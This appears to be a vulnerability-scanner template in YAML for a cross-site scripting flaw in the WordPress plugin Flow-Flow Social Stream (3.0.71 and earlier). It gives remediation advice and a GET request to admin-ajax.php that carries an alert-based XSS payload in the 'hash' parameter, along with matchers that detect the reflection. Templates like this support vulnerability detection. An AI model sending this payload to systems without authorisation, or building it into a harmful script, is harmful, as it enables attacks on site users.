id: flow-flow-social-stream-xss
info:
  name: Flow-Flow Social Stream <= 3.0.71 - Cross-Site Scripting
  author:
  - l0ne1y
  description: |-
    WordPress Plugin Flow-Flow Social Stream Cross-Site Scripting Vulnerability
    WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed using PHP language. The platform supports setting up personal blog websites on PHP and MySQL servers. WordPress plugin is an application plugin.

    The WordPress plugin Flow-Flow Social Stream prior to 3.0.71 has a cross-site scripting vulnerability that occurs when the plugin does not sanitize and escape parameters on the reset password form. An attacker could exploit this vulnerability to perform cross-site scripting attacks.
  severity: medium
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.org/plugins/

    Temporary fix:
    1. Filter the input (and URL parameters), encode the output, and combine the whitelist and blacklist. That is to say, filter all submitted content, filter the parameters in the URL, and filter out relevant content that will cause the script to be executed; and then HTML-encode the content dynamically output to the page so that the script cannot be executed in the browser. Although input filtering can be bypassed, a large number of XSS attacks will still be intercepted; finally, characters are whitelisted or blacklisted.
requests:
- matchers:
  - type: word
    condition: and
    part: body
    words:
    - '"hash":"<img src=x onerror=alert(document.domain)>"'
    - '"errors"'
  - type: word
    part: header
    words:
    - text/html
  - type: status
    status:
    - 200
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-admin/admin-ajax.php?action=fetch_posts&stream-id=1&hash=%3Cimg%20src=x%20onerror=alert(document.domain)%3E'
  method: GET
